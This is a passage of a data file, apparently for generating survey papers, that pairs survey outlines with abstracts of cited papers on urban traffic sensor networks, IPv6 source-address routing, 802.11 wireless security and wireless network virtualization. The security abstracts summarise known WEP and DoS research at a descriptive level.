Title: A Survey on Urban Traffic Management System Using Wireless Sensor Networks Section 1: Introduction Description 1: This section introduces the problem of increased vehicle usage, traffic congestion, and the need for intelligent traffic management systems using wireless sensor networks. Section 2: Key Issues in Urban Traffic Management System Description 2: This section discusses the key issues related to urban traffic management, such as recurring and non-recurring traffic congestion, and the detection of non-recurring congestion. Section 3: Overview Description 3: This section provides an overview of the sensing evolution, traffic sensing technologies, the characteristics of a general sensor node, and the hierarchical functionality of a WSN-based urban traffic management system. Section 4: Sensing Evolution Description 4: This section details the development and advancements in sensor technology and their applications in traffic management. Section 5: Traffic Sensing Technologies Description 5: This section describes various traffic sensing technologies including their advantages and disadvantages in terms of installation, maintenance, and performance. Section 6: General Sensor Node Description 6: This section elaborates on the components and functionalities of a general sensor node in traffic monitoring. Section 7: Hierarchy of Urban Traffic Management Systems Description 7: This section explains the structure and functions of the three subsystems in an urban traffic management system. Section 8: State-of-the-Art Review Description 8: This section reviews related projects, architectures, data collection schemes, routing algorithms, congestion avoidance schemes, priority-based traffic management schemes, and average waiting time reduction schemes. Section 9: Related Projects Description 9: This section introduces various projects on urban traffic management that focus on different traffic parameters. Section 10: Specific Architectures, Data Collection Schemes, and Routing Algorithms Description 10: This section discusses explicit architectures, data collection schemes, and routing algorithms proposed for WSN-based urban traffic management. Section 11: Congestion Avoidance Schemes Description 11: This section outlines several WSN-based schemes and techniques developed to reduce traffic congestion. Section 12: Priority-Based Traffic Management Schemes Description 12: This section details WSN-based traffic management schemes designed to prioritize emergency vehicles. Section 13: Average Waiting Time Reduction Schemes Description 13: This section presents various WSN-based methodologies for reducing the average waiting time of vehicles at intersections. Section 14: Challenges Description 14: This section discusses significant challenges and issues faced by WSN-based traffic management systems, such as connectivity, coverage, energy cost, congestion, and real-time incident notifications. Section 15: Conclusions and Future Work Description 15: This section provides a summary of the survey, discusses the main challenges, and outlines potential directions for future research in urban traffic management systems using WSNs.
Source-Address-Dependent Routing and Source Address Selection for IPv6 Hosts: Overview of the Problem Space
7
--- paper_title: Ingress Filtering for Multihomed Networks paper_content: BCP 38, RFC 2827, is designed to limit the impact of distributed denial of service attacks, by denying traffic with spoofed addresses access to the network, and to help ensure that traffic is traceable to its correct source network. As a side effect of protecting the Internet against such attacks, the network implementing the solution also protects itself from this and other attacks, such as spoofed management access to networking equipment. There are cases when this may create problems, e.g., with multihoming. This document describes the current ingress filtering operational mechanisms, examines generic issues related to ingress filtering, and delves into the effects on multihoming in particular. This memo updates RFC 2827. --- paper_title: OSPF for IPv6 paper_content: This document describes the modifications to OSPF to support version 6 of the Internet Protocol (IPv6). The fundamental mechanisms of OSPF (flooding, DR election, area support, SPF calculations, etc.) remain unchanged. However, some changes have been necessary, either due to changes in protocol semantics between IPv4 and IPv6, or simply to handle the increased address size of IPv6. --- paper_title: IPv6 Multihoming without Network Address Translation paper_content: Network Address and Port Translation (NAPT) works well for conserving ::: global addresses and addressing multihoming requirements because an ::: IPv4 NAPT router implements three functions: source address selection, ::: next-hop resolution, and (optionally) DNS resolution. For IPv6 hosts, ::: one approach could be the use of IPv6-to-IPv6 Network Prefix ::: Translation (NPTv6). However, NAT and NPTv6 should be avoided, if at ::: all possible, to permit transparent end-to-end connectivity. In this ::: document, we analyze the use cases of multihoming. We also describe ::: functional requirements and possible solutions for multihoming without ::: the use of NAT in IPv6 for hosts and small IPv6 networks that would ::: otherwise be unable to meet minimum IPv6-allocation criteria. We ::: conclude that DHCPv6-based solutions are suitable to solve the ::: multihoming issues described in this document, but NPTv6 may be ::: required as an intermediate solution. --- paper_title: Distributing Address Selection Policy Using DHCPv6 paper_content: RFC 6724 defines default address selection mechanisms for IPv6 that ::: allow nodes to select an appropriate address when faced with multiple ::: source and/or destination addresses to choose between. RFC 6724 allows ::: for the future definition of methods to administratively configure the ::: address selection policy information. This document defines a new ::: DHCPv6 option for such configuration, allowing a site administrator to ::: distribute address selection policy overriding the default address ::: selection parameters and policy table, and thus allowing the ::: administrator to control the address selection behavior of nodes in ::: their site. ---
Title: Source-Address-Dependent Routing and Source Address Selection for IPv6 Hosts: Overview of the Problem Space Section 1: Introduction Description 1: This section provides an introduction to the paper, explaining the overall context and importance of source-address-dependent routing (SADR) and the issues that arise due to ingress filtering, especially in multihomed networks. Section 2: Scope Description 2: This section outlines the scenarios where source address dependent routing is necessary from the host's perspective, elaborating on different configurations and setups, including multi-prefix multi-interface scenarios and corporate VPNs. Section 3: Scenario 2: Multi-Prefix Multihoming Description 3: This section delves into the specific multi-prefix multihoming use case, explaining the challenges and the need for source address dependent routing to prevent packet drops due to ingress filtering in various networking environments, including home networks. Section 4: Analysis of Source Address Dependent Routing Description 4: This section presents an analysis of the previously discussed scenarios, examining the relevance and application of SADR in different provisioning domains and how proper configuration can mitigate issues. Section 5: Scenarios Analysis Description 5: This section analyzes the scenarios detailed earlier, discussing potential solutions and configurations to avoid ingress filtering and maintain proper routing. Section 6: Discussion on Alternate Solutions Description 6: This section provides a discussion on alternative solutions to SADR, including source address selection rules and the necessary information that hosts need for correct source address selection without making specific recommendations. Section 7: Router Advertisement Option Description 7: This section discusses the need for new router advertisement options for source address dependent routing, including route prefix with source address/prefix option and the configuration requirements for both router advertisement and DHCP options.
A Survey of Wireless Security
10
--- paper_title: Static and dynamic 4-way handshake solutions to avoid denial of service attack in Wi-Fi protected access and IEEE 802.11i paper_content: This paper focuses on WPA and IEEE 802.11i protocols that represent two important solutions in the wireless environment. Scenarios where it is possible to produce a DoS attack and DoS flooding attacks are outlined. The last phase of the authentication process, represented by the 4-way handshake procedure, is shown to be unsafe from DoS attack. This can produce the undesired effect of memory exhaustion if a flooding DoS attack is conducted. In order to avoid DoS attack without increasing the complexity of wireless mobile devices too much and without changing through some further control fields of the frame structure of wireless security protocols, a solution is found and an extension of WPA and IEEE 802.11 is proposed. A protocol extension with three "static" variants and with a resource-aware dynamic approach is considered. The three enhancements to the standard protocols are achieved through some simple changes on the client side and they are robust against DoS and DoS flooding attack. Advantages introduced by the proposal are validated by simulation campaigns and simulation parameters such as attempted attacks, successful attacks, and CPU load, while the algorithm execution time is evaluated. Simulation results show how the three static solutions avoid memory exhaustion and present a good performance in terms of CPU load and execution time in comparison with the standard WPA and IEEE 802.11i protocols. However, if the mobile device presents different resource availability in terms of CPU and memory or if resource availability significantly changes in time, a dynamic approach that is able to switch among three different modalities could be more suitable. --- paper_title: A trivial denial of service attack on IEEE 802.11 direct sequence spread spectrum wireless LANs paper_content: The paper describes a trivial, but highly effective, denial of service attack based on commonly available IEEE 802.11 hardware and freely available software. The attack requires limited resources and is inexpensive to mount. The paper discusses the attack, its implementation, and provides an analysis of methods to achieve optimal denial of service results. While there is currently no defense against this type of attack, the paper also discusses possibilities for attack mitigation. --- paper_title: Holistic approach to Wep protocol in securing wireless network infrastructure paper_content: Constant increase in use of wireless infrastructure networks for business purposes created a need for strong safety mechanisms. This paper describes WEP (Wired Equivalent Privacy) protocol for the protection of wireless networks, its security deficiencies, as well as the various kinds of attacks that can jeopardize security goals of WEP protocol: authentication confidentiality and integrity. The paper, also, gives a summary of security improvements of WEP protocol that can lead to the higher level of wireless network infrastructure protection. Comparative analysis shows the advantages of the new 802.11i standard in comparison to the previous security solutions. A proposal of possible security improvements of RSNA (Robust Security Network Association) is presented. --- paper_title: Intercepting mobile communications: the insecurity of 802.11 paper_content: The 802.11 standard for wireless networks includes a Wired Equivalent Privacy (WEP) protocol, used to protect link-layer communications from eavesdropping and other attacks. We have discovered several serious security flaws in the protocol, stemming from mis-application of cryptographic primitives. The flaws lead to a number of practical attacks that demonstrate that WEP fails to achieve its security goals. In this paper, we discuss in detail each of the flaws, the underlying security principle violations, and the ensuing attacks. --- paper_title: Some Remarks on the TKIP Key Mixing Function of IEEE 802.11i paper_content: Temporal key integrity protocol (TKIP) is a sub-protocol of IEEE 802.11i. TKIP remedies some security flaws in wired equivalent privacy (WEP) protocol. TKIP adds four new algorithms to WEP: a message integrity code (MIC) called Michael, an initialization vector (IV) sequencing discipline, a key mixing function and a re-keying mechanism. The key mixing function, also called temporal key hash, de-correlates the IVs from weak keys. Some cryptographic properties of the substitution box (S-box) used in the key mixing function are investigated in this paper, such as regularity, avalanche effect, differ uniform and linear structure. Moen et al pointed out that there existed a temporal key recovery attack in TKIP key mixing function. In this paper a method is proposed to defend against the attack, and the resulting effect on performance is discussed. --- paper_title: Counter with CBC-MAC (CCM) paper_content: Counter with CBC-MAC (CCM) is a generic authenticated encryption block cipher mode. CCM is defined for use with 128-bit block ciphers, such as the Advanced Encryption Standard (AES). --- paper_title: Experiences in passively detecting session hijacking attacks in IEEE 802.11 networks paper_content: Current IEEE 802.11 wireless networks are vulnerable to session hijacking attacks as the existing standards fail to address the lack of authentication of management frames and network card addresses, and rely on loosely coupled state machines. Even the new WLAN security standard - IEEE 802.11i does not address these issues. In our previous work, we proposed two new techniques for improving detection of session hijacking attacks that are passive, computationally inexpensive, reliable, and have minimal impact on network performance. These techniques utilise unspoofable characteristics from the MAC protocol and the physical layer to enhance confidence in the intrusion detection process. This paper extends our earlier work and explores usability, robustness and accuracy of these intrusion detection techniques by applying them to eight distinct test scenarios. A correlation engine has also been introduced to maintain the false positives and false negatives at a manageable level. We also explore the process of selecting optimum thresholds for both detection techniques. For the purposes of our experiments, Snort-Wireless open source wireless intrusion detection system was extended to implement these new techniques and the correlation engine. Absence of any false negatives and low number of false positives in all eight test scenarios successfully demonstrated the effectiveness of the correlation engine and the accuracy of the detection techniques. ---
Title: A Survey of Wireless Security Section 1: Introduction Description 1: This section introduces the topic of wireless network security, highlighting the growing popularity of wireless networks, their advantages, and the need for security mechanisms. Section 2: Security Threats to 802.11 Wireless Networks Description 2: This section describes various security threats that can jeopardize the security of 802.11 wireless networks, including attacks on confidentiality, integrity, and availability. Section 3: WEP Protocol Description 3: This section explains the WEP protocol, its functions, and how it aims to provide data security for wireless networks. Section 4: Security Deficiencies of WEP Protocol Description 4: This section details the security deficiencies of the WEP protocol, including risks of keystream reuse, key management issues, message modification, injection, and decryption vulnerabilities. Section 5: Safety Improvements of WEP Description 5: This section describes significant safety improvements of WEP protocol, including comparisons with WPA and WPA2, and the new IEEE 802.11i standard. Section 6: RSA Patch for WEP Description 6: This section explains the RSA patch for WEP, an improvement designed to generate unique keys for each packet to enhance security. Section 7: Wi-Fi Protection Description 7: This section details Wi-Fi Protected Access (WPA), its features, and enhancements over WEP to provide stronger protection for wireless networks. Section 8: TKIP Description 8: This section explains the Temporal Key Integrity Protocol (TKIP), a set of algorithms designed to improve and solve security problems of WEP. Section 9: 802.1x Description 9: This section discusses the 802.1x standard for secure network access and its role in wireless security, including its authentication mechanisms. Section 10: RC4 and AES Cryptographic Algorithms Description 10: This section describes the RC4 and AES cryptographic algorithms, their functionalities, and their roles in ensuring data confidentiality and integrity in wireless networks. Section 11: Conclusion Description 11: This section summarizes the survey, highlighting the key points about wireless security protocols, their improvements, and remaining challenges.
Resource Slicing in Virtual Wireless Networks: A Survey
13
--- paper_title: Software-Defined and Virtualized Future Mobile and Wireless Networks: A Survey paper_content: With the proliferation of mobile demands and increasingly multifarious services and applications, mobile Internet has been an irreversible trend. Unfortunately, the current mobile and wireless network (MWN) faces a series of pressing challenges caused by the inherent design. In this paper, we extend two latest and promising innovations of Internet, software-defined networking and network virtualization, to mobile and wireless scenarios. We first describe the challenges and expectations of MWN, and analyze the opportunities provided by the software-defined wireless network (SDWN) and wireless network virtualization (WNV). Then, this paper focuses on SDWN and WNV by presenting the main ideas, advantages, ongoing researches and key technologies, and open issues respectively. Moreover, we interpret that these two technologies highly complement each other, and further investigate efficient joint design between them. This paper confirms that SDWN and WNV may efficiently address the crucial challenges of MWN and significantly benefit the future mobile and wireless network. --- paper_title: Network Virtualization: Technologies, Perspectives, and Frontiers paper_content: Network virtualization refers to a broad set of technologies. Commercial solutions have been offered by the industry for years, while more recently the academic community has emphasized virtualization as an enabler for network architecture research, deployment, and experimentation. We review the entire spectrum of relevant approaches with the goal of identifying the underlying commonalities. We offer a unifying definition of the term “network virtualization” and examine existing approaches to bring out this unifying perspective. We also discuss a set of challenges and research directions that we expect to come to the forefront as network virtualization technologies proliferate. --- paper_title: Mobile Network Resource Sharing Options: Performance Comparisons paper_content: Resource sharing among mobile network operators is a promising way to tackle growing data demand by increasing capacity and reducing costs of network infrastructure deployment and operation. In this work, we evaluate sharing options that range from simple approaches that are feasible in the near-term on traditional infrastructure to complex methods that require specialized/virtualized infrastructure. We build a simulation testbed supporting two geographically overlapped 4G LTE macro cellular networks and model the sharing architecture/process between the network operators. We compare Capacity Sharing (CS) and Spectrum Sharing (SS) on traditional infrastructure and Virtualized Spectrum Sharing (VSS) and Virtualized PRB Sharing (VPS) on virtualized infrastructure under light, moderate and heavy user loading scenarios in collocated and noncollocated E-UTRAN deployment topologies. We also study these sharing options in conservative and aggressive sharing participation modes. Based on simulation results, we conclude that CS, a generalization of traditional roaming, is the best performing and simplest option, SS is least effective and that VSS and VPS perform better than spectrum sharing with added complexity. --- paper_title: Virtual radio: a framework for configurable radio networks paper_content: Network virtualization has recently been proposed for the development of large scale experimental networks, but also as design principle for a Future Internet. In this paper we describe the background to network virtualization and extend this concept into the wireless domain, which we denote as radio virtualization. With radio virtualization different virtual radio networks can operate on top of a common shared infrastructure and share the same radio resources. We present how this radio resource sharing can be performed efficiently without interference between the different virtual radio networks. Further we discuss how radio transmission functionality can be configured. Radio virtualization provides flexibility in the design and deployment of new wireless networking concepts. It allows customization of radio networks for dedicated networking services at reduced deployment costs. --- paper_title: Wireless Network Virtualization: A Survey, Some Research Issues and Challenges paper_content: Since wireless network virtualization enables abstraction and sharing of infrastructure and radio spectrum resources, the overall expenses of wireless network deployment and operation can be reduced significantly. Moreover, wireless network virtualization can provide easier migration to newer products or technologies by isolating part of the network. Despite the potential vision of wireless network virtualization, several significant research challenges remain to be addressed before widespread deployment of wireless network virtualization, including isolation, control signaling, resource discovery and allocation, mobility management, network management and operation, and security as well as non-technical issues such as governance regulations, etc. In this paper, we provide a brief survey on some of the works that have already been done to achieve wireless network virtualization, and discuss some research issues and challenges. We identify several important aspects of wireless network virtualization: overview, motivations, framework, performance metrics, enabling technologies, and challenges. Finally, we explore some broader perspectives in realizing wireless network virtualization. --- paper_title: Programming Software-Defined wireless networks paper_content: Programming a mobile network requires to account for multiple complex operations, such as allocating radio resources and monitoring interference. Nevertheless, the current Software-Defined Networking ecosystem provides little support for mobile networks in term of radio data-plane abstractions, controllers, and programming primitives. Starting from the consideration that WiFi is becoming an integral part of the 5G architecture, we present a set of programming abstractions modeling three fundamental aspects of a WiFi network, namely state management of wireless clients, resource provisioning, and network state collection. The proposed abstractions hide away the implementation details of the underlying wireless technology providing programmers with expressive tools to control the state of the network. We also describe a proof-of-concept implementation of a Software-Defined Radio Access Network controller for WiFi networks and a Python-based Software Development Kit leveraging the proposed abstractions. The resulting platform can be effectively leveraged in order to implement typical control tasks such as mobility management and traffic engineering as well as applications and services such as multicast video delivery and/or dynamic content caching. --- paper_title: SoftCell: scalable and flexible cellular core network architecture paper_content: Cellular core networks suffer from inflexible and expensive equipment, as well as from complex control-plane protocols. To address these challenges, we present SoftCell, a scalable architecture that supports fine-grained policies for mobile devices in cellular core networks, using commodity switches and servers. SoftCell enables operators to realize high-level service policies that direct traffic through sequences of middleboxes based on subscriber attributes and applications. To minimize the size of the forwarding tables, SoftCell aggregates traffic along multiple dimensions---the service policy, the base station, and the mobile device---at different switches in the network. Since most traffic originates from mobile devices, SoftCell performs fine-grained packet classification at the access switches, next to the base stations, where software switches can easily handle the state and bandwidth requirements. SoftCell guarantees that packets belonging to the same connection traverse the same sequence of middleboxes in both directions, even in the presence of mobility. We demonstrate that SoftCell improves the scalability and flexibility of cellular core networks by analyzing real LTE workloads, performing micro-benchmarks on our prototype controller as well as large-scale simulations. --- paper_title: Building Programmable Wireless Networks: An Architectural Survey paper_content: In recent times, there is increasing consensus that the traditional Internet architecture needs to be evolved for it to sustain unstinted growth and innovation. A major reason for the perceived architectural ossification is the lack of the ability to program the network as a system. This situation has resulted partly from historical decisions in the original Internet design which emphasized decentralized network operations through colocated data and control planes on each network device. The situation for wireless networks is no different resulting in a lot of complexity and a plethora of largely incompatible wireless technologies. With traditional architectures providing limited support for programmability, there is a broad realization in the wireless community that future programmable wireless networks would require significant architectural innovations. In this paper, we will present an unified overview of the programmability solutions that have been proposed at the device and the network level. In particular, we will discuss software-defined radio (SDR), cognitive radio (CR), programmable MAC processor, and programmable routers as device-level programmability solutions, and software-defined networking (SDN), cognitive wireless networking (CWN), virtualizable wireless networking (VWN) and cloud-based wireless networking (CbWN) as network-level programmability solutions. We provide both a self-contained exposition of these topics as well as a broad survey of the application of these trends in modern wireless networks. --- paper_title: Software-Defined and Virtualized Future Mobile and Wireless Networks: A Survey paper_content: With the proliferation of mobile demands and increasingly multifarious services and applications, mobile Internet has been an irreversible trend. Unfortunately, the current mobile and wireless network (MWN) faces a series of pressing challenges caused by the inherent design. In this paper, we extend two latest and promising innovations of Internet, software-defined networking and network virtualization, to mobile and wireless scenarios. We first describe the challenges and expectations of MWN, and analyze the opportunities provided by the software-defined wireless network (SDWN) and wireless network virtualization (WNV). Then, this paper focuses on SDWN and WNV by presenting the main ideas, advantages, ongoing researches and key technologies, and open issues respectively. Moreover, we interpret that these two technologies highly complement each other, and further investigate efficient joint design between them. This paper confirms that SDWN and WNV may efficiently address the crucial challenges of MWN and significantly benefit the future mobile and wireless network. --- paper_title: Can the Production Network Be the Testbed? paper_content: A persistent problem in computer network research is validation. When deciding how to evaluate a new feature or bug fix, a researcher or operator must trade-off realism (in terms of scale, actual user traffic, real equipment) and cost (larger scale costs more money, real user traffic likely requires downtime, and real equipment requires vendor adoption which can take years). Building a realistic testbed is hard because "real" networking takes place on closed, commercial switches and routers with special purpose hardware. But if we build our testbed from software switches, they run several orders of magnitude slower. Even if we build a realistic network testbed, it is hard to scale, because it is special purpose and is in addition to the regular network. It needs its own location, support and dedicated links. For a testbed to have global reach takes investment beyond the reach of most researchers. ::: ::: In this paper, we describe a way to build a testbed that is embedded in--and thus grows with--the network. The technique--embodied in our first prototype, FlowVisor--slices the network hardware by placing a layer between the control plane and the data plane. We demonstrate that FlowVisor slices our own production network, with legacy protocols running in their own protected slice, alongside experiments created by researchers. The basic idea is that if unmodified hardware supports some basic primitives (in our prototype, Open-Flow, but others are possible), then a worldwide testbed can ride on the coat-tails of deployments, at no extra expense. Further, we evaluate the performance impact and describe how FlowVisor is deployed at seven other campuses as part of a wider evaluation platform. --- paper_title: Towards programmable enterprise WLANS with Odin paper_content: We present Odin, an SDN framework to introduce programmability in enterprise wireless local area networks (WLANs). Enterprise WLANs need to support a wide range of services and functionalities. This includes authentication, authorization and accounting, policy, mobility and interference management, and load balancing. WLANs also exhibit unique challenges. In particular, access point (AP) association decisions are not made by the infrastructure, but by clients. In addition, the association state machine combined with the broadcast nature of the wireless medium requires keeping track of a large amount of state changes. To this end, Odin builds on a light virtual AP abstraction that greatly simplifies client management. Odin does not require any client side modifications and its design supports WPA2 Enterprise. With Odin, a network operator can implement enterprise WLAN services as network applications. A prototype implementation demonstrates Odin's feasibility. --- paper_title: A Survey on Software-Defined Network and OpenFlow: From Concept to Implementation paper_content: Software-defined network (SDN) has become one of the most important architectures for the management of largescale complex networks, which may require repolicing or reconfigurations from time to time. SDN achieves easy repolicing by decoupling the control plane from data plane. Thus, the network routers/switches just simply forward packets by following the flow table rules set by the control plane. Currently, OpenFlow is the most popular SDN protocol/standard and has a set of design specifications. Although SDN/OpenFlow is a relatively new area, it has attracted much attention from both academia and industry. In this paper, we will conduct a comprehensive survey of the important topics in SDN/OpenFlow implementation, including the basic concept, applications, language abstraction, controller, virtualization, quality of service, security, and its integration with wireless and optical networks. We will compare the pros and cons of different schemes and discuss the future research trends in this exciting area. This survey can help both industry and academia R&D people to understand the latest progress of SDN/OpenFlow designs. --- paper_title: Towards a scalable and near-sighted control plane architecture for WiFi SDNs paper_content: Not much is known today about how to reap the SDN benefits in WiFi networks-a critical use case given the increasing importance of WiFi networks. This paper presents AeroFlux, a scalable software-defined wireless network, that supports large enterprise and carrier WiFi deployments with low-latency programmatic control of fine-grained WiFi-specific transmission settings. This is achieved through AeroFlux's hierarchical design. We report on an early prototype implementation and evaluation, showing that AeroFlux can significantly reduce control plane traffic. --- paper_title: SoftRAN: software defined radio access network paper_content: An important piece of the cellular network infrastructure is the radio access network (RAN) that provides wide-area wireless connectivity to mobile devices. The fundamental problem the RAN solves is figuring out how best to use and manage limited spectrum to achieve this connectivity. In a dense wireless deployment with mobile nodes and limited spectrum, it becomes a difficult task to allocate radio resources, implement handovers, manage interference, balance load between cells, etc. We argue that LTE's current distributed control plane is suboptimal in achieving the above objective. We propose SoftRAN, a fundamental rethink of the radio access layer. SoftRAN is a software defined centralized control plane for radio access networks that abstracts all base stations in a local geographical area as a virtual big-base station comprised of a central controller and radio elements (individual physical base stations). In defining such an architecture, we create a framework through which a local geographical network can effectively perform load balancing and interference management, as well as maximize throughput, global utility, or any other objective. --- paper_title: Programmatic orchestration of WiFi networks paper_content: With wireless technologies becoming prevalent at the last hop, today's network operators need to manage WiFi access networks in unison with their wired counterparts. However, the non-uniformity of feature sets in existing solutions and the lack of programmability makes this a challenging task. This paper proposes Odin, an SDN-based solution to bridge this gap. With Odin, we make the following contributions: (i) Light Virtual Access Points (LVAPs), a novel programming abstraction for addressing the IEEE 802.11 protocol stack complexity, (ii) a design and implementation for a software-defined WiFi network architecture based on LVAPs, and (iii) a prototype implementation on top of commodity access point hardware without modifications to the IEEE 802.11 client, making it practical for today's deployments. To highlight the effectiveness of the approach we demonstrate six WiFi network services on top of Odin including load-balancing, mobility management, jammer detection, automatic channel-selection, energy management, and guest policy enforcement. To further foster the development of our framework, the Odin prototype is made publicly available. --- paper_title: AeroFlux: A Near-Sighted Controller Architecture for Software-Defined Wireless Networks paper_content: Applying the concept of SDN to WiFi networks is challenging, since wireless networks feature many peculiarities and knobs that often do not exist in wired networks: obviously, WiFi communicates over a shared medium, with all its implications, e.g., higher packet loss and hidden or exposed terminals. Moreover, wireless links can be operated in a number of different regimes, e.g., transmission rate and power settings can be adjusted, RTS/CTS mechanisms can be used. Indeed, due to the non-stationary characteristic of the wireless channel, permanently adjusting settings such as transmission rate and power is crucial for the performance of WiFi networks and brings significant benefits in the service quality, e.g., through reducing the packet loss probability. Today’s rate and power control is mainly done on the WiFi device itself. But it is rarely optimized to the application-layer demands and their diverse traffic requirements, e.g., their individual sensitivity to packet loss or jitter. Therefore, if SDN for wireless can provide mechanisms to control the WiFi-specific transmission settings on a per-slice, per-client, and per-flow level, traffic and application-aware optimizations are feasible. This however requires that controllers frequently collect link characteristics and, accordingly, adjust transmission settings in a timely manner. As a reference, the standard rate control mechanism in the Linux kernel adjusts the transmission rate on a wireless link based on transmission success probability statistics every 100 ms. Leaving rate control (and power control accordingly) to a centralized controller comes with a risk of overloading the control plane, or of adding too much latency, while there is limited benefit in maintaining these statistics globally. For instance, the coherence time (also a function of the client mobility) can easily exceed the expected time of the successful transmission of multiple data frames [2], rendering optimized control difficult. In this paper, we suggest a 2-tiered approach for the design of a wireless SDN control plane. Our design, called AeroFlux, handles frequent, localized events close to where they originate, i.e., close to the data plane, by relying on NearSighted Controllers (NSC) [3, 4, 7]. Global events, which require a broader picture of the network’s state, are handled by the Global Controller (GC). More specifically, GC takes care of network functions that require global visibility, such as mobility management and load balancing, whereas NSCs control per-client or per-flow transmission settings such as rate and power based on transmission status feedback information exported by the Access Points (AP), which include the rates for best throughput and best transmission probability. Put differently, we enable the global controller to offload latency-critical or high-load tasks from the tier-1 control plane to the NSCs. This reduces the load on the GC and lowers the latency of critical control plane operations. As a result, with AeroFlux, we realize a scalable wireless SDN architecture which can support large enterprise and carrier WiFi deployments with low-latency programmatic control of fine-grained WiFi-specific transmission settings. The AeroFlux design introduces a set of new trade-offs and optimization opportunities which allow for advancements in the use of the shared wireless medium, and, as a result, in the user’s quality of experience. For instance, our prototype’s perflow control allows application-aware service differentiation by prioritizing multimedia streams (§2). Another key feature of AeroFlux is that it does not require modifications to today’s hardware and works on top of commodity WiFi equipment. 1 The AeroFlux Architecture AeroFlux uses a 2-tiered control plane: the Global Control plane GC and the Near-Sighted Control plane NSC. Figure 1 depicts the high level interactions of the architecture’s building blocks. The GC is logically centralized, e.g., a set of redundant controllers deployed in data centers, whereas the NSCs are located closer to where they are needed, e.g., close to the wireless APs. On the APs runs a Radio Agent (RA), which hosts the Light Virtual Access Points (LVAPs) [6] that abstract the specifics of the 802.11 protocol, such as association and authentication state. Furthermore, LVAPs store per-client OpenFlow and WiFi Datapath Transmission (WDTX) rules. In the following, we describe the different elements in more detail. Global Controller (GC): The global controller handles events which are not time-critical [7] or events belonging to inherently global tasks [4]. Examples include: authentication, wide-area mobility management, global policy verification (including loop-free forwarding sets), client load balancing, and applications for intrusion detection or network monitoring. In addition, the global controller is best suited to man- --- paper_title: Cloud-RAN: Innovative radio access network architecture paper_content: Recent penetration of SDR (Software defined radio) technology into mobile systems of new generation as well as increasing throughput demands in radio access network (RAN) are main development engines of new paradigm in radio access network world, better known as Cloud-Radio Access Network (C-RAN). This inovative architecture whose main proponent among telecom companies is China Mobile, should significantly decrease bussiness costs of Telcos, mainly on the long term basis, and also enable higher resource utilization as well as faster and more flexibile development of radio access networks following the IT concept of Cloud Computing. Although the architecture itself, applied to this field, is quite revolutionary compared to the present one, its realization would be based on optimal combination of existing technologies that would have to be adjusted to system requirements of, mainly, LTE and LTE advanced systems. Even though theoretically, reviewed architecture provides a number of improvements, for its wider acceptance and implementation, certain problems must be solved due to the current capabilities of SDR technology and optical infrastructure. This paper will present brief overview of pros and cons of this architecture as well as an estimate of further progress in this field. This paper will present a new overview of all known techniques to realize a system capable to support a C-RAN network. We explored all the external factors that affect the radio access network and we made our own conclusions. --- paper_title: CloudMAC — An OpenFlow based architecture for 802.11 MAC layer processing in the cloud paper_content: IEEE 802.11 WLANs are a very important technology to provide high speed wireless Internet access. Especially at airports, university campuses or in city centers, WLAN coverage is becoming ubiquitous leading to a deployment of hundreds or thousands of Access Points (AP). Managing and configuring such large WLAN deployments is a challenge. Current WLAN management protocols such as CAPWAP are hard to extend with new functionality. In this paper, we present CloudMAC, a novel architecture for enterprise or carrier grade WLAN systems. By partially offloading the MAC layer processing to virtual machines provided by cloud services and by integrating our architecture with OpenFlow, a software defined networking approach, we achieve a new level of flexibility and reconfigurability. In Cloud-MAC APs just forward MAC frames between virtual APs and IEEE 802.11 stations. The processing of MAC layer frames as well as the creation of management frames is handled at the virtual APs while the binding between the virtual APs and the physical APs is managed using OpenFlow. The testbed evaluation shows that CloudMAC achieves similar performance as normal WLANs, but allows novel services to be implemented easily in high level programming languages. The paper presents a case study which shows that dynamically switching off APs to save energy can be performed seamlessly with CloudMAC, while a traditional WLAN architecture causes large interruptions for users. --- paper_title: NFV: State of the Art, Challenges and Implementation in Next Generation Mobile Networks (vEPC) paper_content: As mobile network users look forward to the connectivity speeds of 5G networks, service providers are facing challenges in complying with connectivity demands without substantial financial investments. Network function virtualization (NFV) is introduced as a new methodology that offers a way out of this bottleneck. NFV is poised to change the core structure of telecommunications infrastructure to be more cost-efficient. In this article, we introduce an NFV framework, and discuss the challenges and requirements of its use in mobile networks. In particular, an NFV framework in the virtual environment is proposed. Moreover, in order to reduce signaling traffic and achieve better performance, this article proposes a criterion to bundle multiple functions of a virtualized evolved packet core in a single physical device or a group of adjacent devices. The analysis shows that the proposed grouping can reduce the network control traffic by 70 percent. --- paper_title: Network Function Virtualization: State-of-the-art and Research Challenges paper_content: Network function virtualization (NFV) has drawn significant attention from both industry and academia as an important shift in telecommunication service provisioning. By decoupling network functions (NFs) from the physical devices on which they run, NFV has the potential to lead to significant reductions in operating expenses (OPEX) and capital expenses (CAPEX) and facilitate the deployment of new services with increased agility and faster time-to-value. The NFV paradigm is still in its infancy and there is a large spectrum of opportunities for the research community to develop new architectures, systems and applications, and to evaluate alternatives and trade-offs in developing technologies for its successful deployment. In this paper, after discussing NFV and its relationship with complementary fields of software defined networking (SDN) and cloud computing, we survey the state-of-the-art in NFV, and identify promising research directions in this area. We also overview key NFV projects, standardization efforts, early implementations, use cases, and commercial products. --- paper_title: Wireless Network Virtualization: A Survey, Some Research Issues and Challenges paper_content: Since wireless network virtualization enables abstraction and sharing of infrastructure and radio spectrum resources, the overall expenses of wireless network deployment and operation can be reduced significantly. Moreover, wireless network virtualization can provide easier migration to newer products or technologies by isolating part of the network. Despite the potential vision of wireless network virtualization, several significant research challenges remain to be addressed before widespread deployment of wireless network virtualization, including isolation, control signaling, resource discovery and allocation, mobility management, network management and operation, and security as well as non-technical issues such as governance regulations, etc. In this paper, we provide a brief survey on some of the works that have already been done to achieve wireless network virtualization, and discuss some research issues and challenges. We identify several important aspects of wireless network virtualization: overview, motivations, framework, performance metrics, enabling technologies, and challenges. Finally, we explore some broader perspectives in realizing wireless network virtualization. --- paper_title: Virtualization of Multi-Cell 802.11 Networks: Association and Airtime Control paper_content: This paper investigates the virtualization and optimization of a multi-cell WLAN. We consider the station (STA)-access point (AP) association and airtime control for virtualized 802.11 networks to provide service customization and fairness across multiple internet service providers (ISPs) sharing the common physical infrastructure and network capacity. More specifically, an optimization problem is formulated on the STAs transmission probabilities to maximize the overall network throughput, while providing airtime usage guarantees for the ISPs. Subsequently, an algorithm to reach the optimal solution is developed by applying monomial approximation and geometric programming iteratively. Based on the proposed three-dimensional Markov-chain model of the enhanced distributed channel access (EDCA) protocol, the detailed implementation of the optimal transmission probability is also discussed. The accuracy of the proposed Markov-chain model and the performance of the developed association and airtime control scheme are evaluated through numerical results. --- paper_title: Current trends and perspectives in wireless 